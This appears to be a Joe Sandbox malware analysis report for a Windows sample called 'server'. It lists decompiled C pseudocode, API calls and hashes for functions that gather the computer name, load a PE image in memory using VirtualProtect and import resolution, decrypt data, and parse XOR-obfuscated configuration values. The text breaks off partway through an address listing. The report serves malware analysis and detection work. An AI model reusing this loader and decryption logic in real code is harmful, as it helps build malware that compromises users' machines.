Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: Free$HeapString
String ID: Uet
API String ID: 3806048269-2766386878
Opcode ID: b6b627693b891c682e60becbd07ed2a41b132c3c6b06c28d0930750b721e4773
Instruction ID: e41c5d218663a198f4307a27c844315e8d9b8ce590740d8c49292bced98ae406
Opcode Fuzzy Hash: b6b627693b891c682e60becbd07ed2a41b132c3c6b06c28d0930750b721e4773
Instruction Fuzzy Hash: CB012832500619BBDB239F96CC04EFA3BA9EF48750F048625FE099B220D731A961DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 047E472F Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E047E472F(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E047E33DC(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E047E61DA(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x047e4734
0x047e473f
0x047e4741
0x047e4747
0x047e4749
0x047e474e
0x047e4757
0x047e475b
0x047e4764
0x047e4768
0x047e4777
0x047e476a
0x047e476b
0x047e4770
0x047e4770
0x047e4768
0x047e475b
0x047e4780

APIs

GetComputerNameExA.KERNELBASE(00000003,00000000,047E3DCD,00000000,00000000,?,76B5C740,047E3DCD), ref: 047E4747

Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8

GetComputerNameExA.KERNELBASE(00000003,00000000,047E3DCD,047E3DCE,?,76B5C740,047E3DCD), ref: 047E4764

Part of subcall function 047E61DA: RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: 89a0f5632de3de12c16161154fd31385e5ac103552a1ba55b0edeead8f33e715
Instruction ID: 6a5bb549ac550136d10efb955a9c1f384f3bcf066ef5922da2cdd214a2d8e8f8
Opcode Fuzzy Hash: 89a0f5632de3de12c16161154fd31385e5ac103552a1ba55b0edeead8f33e715
Instruction Fuzzy Hash: F7F0B47660011AFAEB11D6ABCC08EBF3BACEBC9645F500155E904D3240EA70EE0186B0

Uniqueness

Uniqueness Score: -1.00%

Function 047E5006 Relevance: 3.0, APIs: 2, Instructions: 26
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E047E5006(signed int __edx, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				signed int _t10;

				_t10 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x47ea2d8 = _t3;
				if(_t3 == 0) {
					_t8 = 8;
					return _t8;
				}
				 *0x47ea1c8 = GetTickCount();
				_t5 = E047E54D8(_a4);
				if(_t5 == 0) {
					_t5 = E047E213E(_t9, _a4); // executed
					if(_t5 == 0) {
						if(E047E6392(_t9) != 0) {
							 *0x47ea300 = 1; // executed
						}
						_t7 = E047E2523(_t10); // executed
						return _t7;
					}
				}
				return _t5;
			}

0x047e5006
0x047e500f
0x047e5015
0x047e501c
0x047e5020
0x00000000
0x047e5020
0x047e502d
0x047e5032
0x047e5039
0x047e503f
0x047e5046
0x047e504f
0x047e5051
0x047e5051
0x047e505b
0x00000000
0x047e505b
0x047e5046
0x047e5060

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,047E107E,?), ref: 047E500F
GetTickCount.KERNEL32 ref: 047E5023

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: CountCreateHeapTick
String ID:
API String ID: 2177101570-0
Opcode ID: 0b27fa557c322b04812bb7f5700adce201c12989a7a1708c035b05f28b84cdd6
Instruction ID: c7f112157844f9da14a987702e0e15b8e69bff38abb9e5d505e65b3bd1700451
Opcode Fuzzy Hash: 0b27fa557c322b04812bb7f5700adce201c12989a7a1708c035b05f28b84cdd6
Instruction Fuzzy Hash: 29F06D7174430AFAEB612FB3A91877537A4AB4C70CF508B25F901D8382EBB5F8009A61

Uniqueness

Uniqueness Score: -1.00%

Function 00411AA2 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?), ref: 00411AE5

Memory Dump Source

Source File: 00000000.00000002.523801722.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40f000_server.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ffc422ddd39041b05de87dbb1cc33fb912c3cbe10e636ac8d1964e38e8d4c3fb
Instruction ID: 8f1e6770ac83704bff406797ba9c9fc97c9d0a6c2db46855d965d7ba77dce368
Opcode Fuzzy Hash: ffc422ddd39041b05de87dbb1cc33fb912c3cbe10e636ac8d1964e38e8d4c3fb
Instruction Fuzzy Hash: 0D01B1353062159BEB249F65DC04BA73798AF917A0F05452AEE158B2B0E77CAC80C698

Uniqueness

Uniqueness Score: -1.00%

Function 047E2839 Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E047E2839(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x47ea348; // 0xc3d5a8
				_t4 = _t15 + 0x47eb3e8; // 0x5428990
				_t20 = _t4;
				_t6 = _t15 + 0x47eb174; // 0x650047
				_t17 = E047E790B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E047E661C(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x047e2843
0x047e284a
0x047e284b
0x047e284c
0x047e284d
0x047e2853
0x047e2858
0x047e2858
0x047e2862
0x047e2874
0x047e287b
0x047e28a9
0x047e287d
0x047e287f
0x047e2884
0x047e28a6
0x047e2886
0x047e2889
0x047e2890
0x047e2895
0x047e2897
0x047e2897
0x047e289c
0x047e289c
0x047e2884
0x047e28b0

APIs

Part of subcall function 047E790B: SysFreeString.OLEAUT32(?), ref: 047E79EA

Part of subcall function 047E661C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,047E4B72,004F0053,00000000,?), ref: 047E6625
Part of subcall function 047E661C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,047E4B72,004F0053,00000000,?), ref: 047E664F
Part of subcall function 047E661C: memset.NTDLL ref: 047E6663

SysFreeString.OLEAUT32(00000000), ref: 047E289C

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: b3ee12019f5fbf44f3a10e7530a1463a4eb02c51cc3be041ca219799f0f228d1
Instruction ID: aa077b9ea9ef1dab5c8d5dd0e04db8402c098dc9b5c2ee3da943c5ff71a198bf
Opcode Fuzzy Hash: b3ee12019f5fbf44f3a10e7530a1463a4eb02c51cc3be041ca219799f0f228d1
Instruction Fuzzy Hash: 7301B1B2500119BFDB81DFAACC04DAABBB8FF0C350F004665E902E7261E771A912C790

Uniqueness

Uniqueness Score: -1.00%

Function 004146F0 Relevance: 1.5, APIs: 1, Instructions: 15libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(02B54000,00414A97), ref: 00414749

Memory Dump Source

Source File: 00000000.00000002.523801722.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40f000_server.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 60b703b22f914805831b0cf53231d61d5b884dcc1632bd1b8addb44175fccc55
Instruction ID: cc7f045297b93ef6274fd01b4fdcab6efc4b6845af6071ac66646583cad711a3
Opcode Fuzzy Hash: 60b703b22f914805831b0cf53231d61d5b884dcc1632bd1b8addb44175fccc55
Instruction Fuzzy Hash: 5FE09264A98360CAE70ADF10F5283113672FF14784FA8AC1D9159CF261E7B604F49B69

Uniqueness

Uniqueness Score: -1.00%

Function 00401D3C Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00401D3C(void* __eax, intOrPtr _a4) {

				 *0x404190 =  *0x404190 & 0x00000000;
				_push(0);
				_push(0x40418c);
				_push(1);
				_push(_a4);
				 *0x404188 = 0xc; // executed
				L00401682(); // executed
				return __eax;
			}

0x00401d3c
0x00401d43
0x00401d45
0x00401d4a
0x00401d4c
0x00401d50
0x00401d5a
0x00401d5f

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004013CC,00000001,0040418C,00000000), ref: 00401D5A

Memory Dump Source

Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
Instruction ID: 8b1a9882f0f7b6f5a619b3d6300b2bdd32795284b236dc0e31706888a106ff8d
Opcode Fuzzy Hash: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
Instruction Fuzzy Hash: AFC04CF4140300B7E620AB409D5AF057A5577A4715F61062DFB04391E1C3F91094952D

Uniqueness

Uniqueness Score: -1.00%

Function 004012E6 Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004012E6(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x404160, 0, _a4); // executed
				return _t2;
			}

0x004012f2
0x004012f8

APIs

RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2

Memory Dump Source

Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
Instruction ID: e72f98105ba7c706faca8ef9926cddb4ff6cd2f9e0c1ce1923eff6ceed1ee1be
Opcode Fuzzy Hash: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
Instruction Fuzzy Hash: 92B012B1100100ABCA118F11EF08F06BE31B7E4701F004030B3042407482314C20FB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00401BA9 Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401BA9(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x404160, 0, _a4); // executed
				return _t2;
			}

0x00401bb5
0x00401bbb

APIs

RtlFreeHeap.NTDLL(00000000,00000030,004017ED,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,00401A66), ref: 00401BB5

Memory Dump Source

Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
Instruction ID: ce698fd0423bda5088509b7a42681047dd9c8e559710f82c1ef419a06116bbed
Opcode Fuzzy Hash: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
Instruction Fuzzy Hash: 8AB01271000100BBCA118F10EF08F067F21B7E4701F008030B3046407482314D60FB0C

Uniqueness

Uniqueness Score: -1.00%

Function 004012FB Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004012FB(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				void* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x404180;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4);
				_t18 = E00401202( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4), _t16 + 0xbce8a57d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E00401BC4(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E00401000(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E004014CF(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E00401BA9(_t42);
					L8:
					return _t29;
				}
			}

0x00401303
0x00401305
0x00401321
0x00401332
0x00401339
0x00401397
0x00000000
0x0040133b
0x0040133b
0x00401345
0x00401349
0x0040134e
0x00401351
0x00401356
0x0040135a
0x0040135f
0x00401364
0x00401368
0x0040136d
0x0040136e
0x00401372
0x00401377
0x0040137f
0x0040137f
0x00401377
0x00401368
0x0040135a
0x00401381
0x0040138a
0x0040138e
0x00401398
0x0040139e
0x0040139e

APIs

Part of subcall function 00401202: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401248
Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401274
Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 004012A0

Part of subcall function 00401000: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038

Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
Part of subcall function 004014CF: GetLastError.KERNEL32 ref: 00401583

GetLastError.KERNEL32(?,?), ref: 00401379

Memory Dump Source

Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
String ID:
API String ID: 3135819546-0
Opcode ID: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
Instruction ID: 9c7335bcc5d41c3ee7976e84fb0b4f56712358cbe666051dfec51b4dde3629c0
Opcode Fuzzy Hash: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
Instruction Fuzzy Hash: 8B11E976600301ABD711ABA68C85DAB77BCAF98318704017EFD01B7A91EA74ED068798

Uniqueness

Uniqueness Score: -1.00%

Function 047E5063 Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E047E5063(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E047E1508( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E047E33DC(_a8 + _a8);
					if(_t21 != 0) {
						E047E22EA(_a4, _t21, _t23);
					}
					E047E61DA(_a4);
				}
				return _t21;
			}

0x047e506b
0x047e5072
0x047e5074
0x047e5083
0x047e508a
0x047e5099
0x047e509d
0x047e50a4
0x047e50a4
0x047e50ac
0x047e50b1
0x047e50b6

APIs

lstrlen.KERNEL32(00000000,00000000,047E3ECE,00000000,?,047E66D9,00000000,047E3ECE,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E5074

Part of subcall function 047E1508: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,047E5088,00000001,047E3ECE,00000000), ref: 047E1540
Part of subcall function 047E1508: memcpy.NTDLL(047E5088,047E3ECE,00000010,?,?,?,047E5088,00000001,047E3ECE,00000000,?,047E66D9,00000000,047E3ECE,?,76B5C740), ref: 047E1559
Part of subcall function 047E1508: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 047E1582
Part of subcall function 047E1508: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 047E159A
Part of subcall function 047E1508: memcpy.NTDLL(00000000,76B5C740,05429600,00000010), ref: 047E15EC

Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
String ID:
API String ID: 894908221-0
Opcode ID: e647c420634cbed2a76afdea96e966a64409197ecc08e79df8d4c9f7bac61ec5
Instruction ID: 11d7e9f8eb4bc0c02da0b66856ad5dc81005057f4eb015503e025df6f97a1ae2
Opcode Fuzzy Hash: e647c420634cbed2a76afdea96e966a64409197ecc08e79df8d4c9f7bac61ec5
Instruction Fuzzy Hash: B1F0547610010DBBDF126F96DC04DEA3B6DEF8C369B408511FD09CA210DA71E55597A0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 047E1D8A Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E047E1D8A(void* __ebx, int* __ecx, void* __edx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t116;
				void* _t119;
				intOrPtr _t122;

				_t119 = __esi;
				_t116 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x47ea344; // 0x43175ac3
				if(E047E10F8( &_v8,  &_v12, _t28 ^ 0xa23f04a7) != 0 && _v12 >= 0x110) {
					 *0x47ea374 = _v8;
				}
				_t33 =  *0x47ea344; // 0x43175ac3
				if(E047E10F8( &_v16,  &_v12, _t33 ^ 0x2bfce340) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x47ea344; // 0x43175ac3
				_push(_t116);
				if(E047E10F8( &_v12,  &_v8, _t39 ^ 0xcca68722) == 0) {
					L67:
					HeapFree( *0x47ea2d8, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x47ea344; // 0x43175ac3
						_t45 = E047E36C5(_t104, _t102, _t98 ^ 0x523046bc);
					}
					_push(_t119);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x47ea2e0 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x47ea344; // 0x43175ac3
						_t46 = E047E36C5(_t104, _t102, _t94 ^ 0x0b3e0d40);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x47ea2e4 = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x47ea344; // 0x43175ac3
						_t47 = E047E36C5(_t104, _t102, _t90 ^ 0x1b5903e6);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x47ea2e8 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x47ea344; // 0x43175ac3
						_t48 = E047E36C5(_t104, _t102, _t86 ^ 0x267c2349);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x47ea004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x47ea344; // 0x43175ac3
						_t49 = E047E36C5(_t104, _t102, _t82 ^ 0x167db74c);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x47ea02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x47ea344; // 0x43175ac3
						_t50 = E047E36C5(_t104, _t102, _t78 ^ 0x02ddbcae);
					}
					if(_t50 == 0) {
						L41:
						 *0x47ea2ec = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x47ea344; // 0x43175ac3
								_t51 = E047E36C5(_t104, _t102, _t75 ^ 0x0cbf33fd);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E047E5B85(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E047E607C();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x47ea344; // 0x43175ac3
								_t52 = E047E36C5(_t104, _t102, _t70 ^ 0x93710135);
							}
							if(_t52 != 0 && E047E5B85(0, _t52) != 0) {
								_t122 =  *0x47ea3cc; // 0x5429600
								E047E5364(_t122 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x47ea344; // 0x43175ac3
								_t53 = E047E36C5(_t104, _t102, _t65 ^ 0x175474b7);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x47ea348; // 0xc3d5a8
								_t22 = _t54 + 0x47eb5f3; // 0x616d692f
								 *0x47ea370 = _t22;
								goto L60;
							} else {
								_t64 = E047E5B85(0, _t53);
								 *0x47ea370 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x47ea344; // 0x43175ac3
										_t56 = E047E36C5(_t104, _t102, _t61 ^ 0xf8a29dde);
									}
									if(_t56 == 0) {
										_t57 =  *0x47ea348; // 0xc3d5a8
										_t23 = _t57 + 0x47eb899; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E047E5B85(0, _t56);
									}
									 *0x47ea3e0 = _t58;
									HeapFree( *0x47ea2d8, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}

0x047e1d8a
0x047e1d8a
0x047e1d8a
0x047e1d8a
0x047e1d8d
0x047e1daa
0x047e1db8
0x047e1db8
0x047e1dbd
0x047e1dd7
0x047e2045
0x047e204c
0x047e2050
0x047e2050
0x047e1ddd
0x047e1de2
0x047e1dfa
0x047e2032
0x047e203c
0x00000000
0x047e1e00
0x047e1e00
0x047e1e01
0x047e1e06
0x047e1e1c
0x047e1e08
0x047e1e08
0x047e1e15
0x047e1e15
0x047e1e1e
0x047e1e27
0x047e1e29
0x047e1e33
0x047e1e38
0x047e1e38
0x047e1e33
0x047e1e3f
0x047e1e55
0x047e1e41
0x047e1e41
0x047e1e4e
0x047e1e4e
0x047e1e59
0x047e1e5b
0x047e1e65
0x047e1e6a
0x047e1e6a
0x047e1e65
0x047e1e71
0x047e1e87
0x047e1e73
0x047e1e73
0x047e1e80
0x047e1e80
0x047e1e8b
0x047e1e8d
0x047e1e97
0x047e1e9c
0x047e1e9c
0x047e1e97
